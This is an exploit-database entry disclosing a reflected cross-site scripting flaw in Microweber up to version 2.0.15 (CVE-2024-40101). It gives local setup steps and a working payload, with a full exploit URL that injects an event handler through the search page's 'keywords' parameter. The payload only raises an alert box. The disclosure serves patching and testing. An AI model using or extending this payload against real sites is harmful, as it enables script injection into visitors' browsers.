[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microweber 2.0.15 Cross Site Scripting Vulnerability

Author
Prerak Mittal
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-39699
Category
web applications
Date add
07-08-2024
CVE
CVE-2024-40101
Platform
php
# Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Prerak Mittal
# Vendor Homepage: https://microweber.org/
# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15
# Version: <=v2.0.15
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-40101

# Description:
## App Installation:
1. Clone the repository and build the application using docker:
```
git clone -b v2.0.15 https://github.com/microweber/microweber.git
cd microweber
docker compose up -d
```
2. Visit http://localhost
3. Follow along the UI installation process.

## Steps to reproduce:

1. Visit http://localhost/search
2. Insert the below payload in `keywords` parameter:
  "onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"

  Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22
  
3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.

#  0day.today [2024-09-19]  #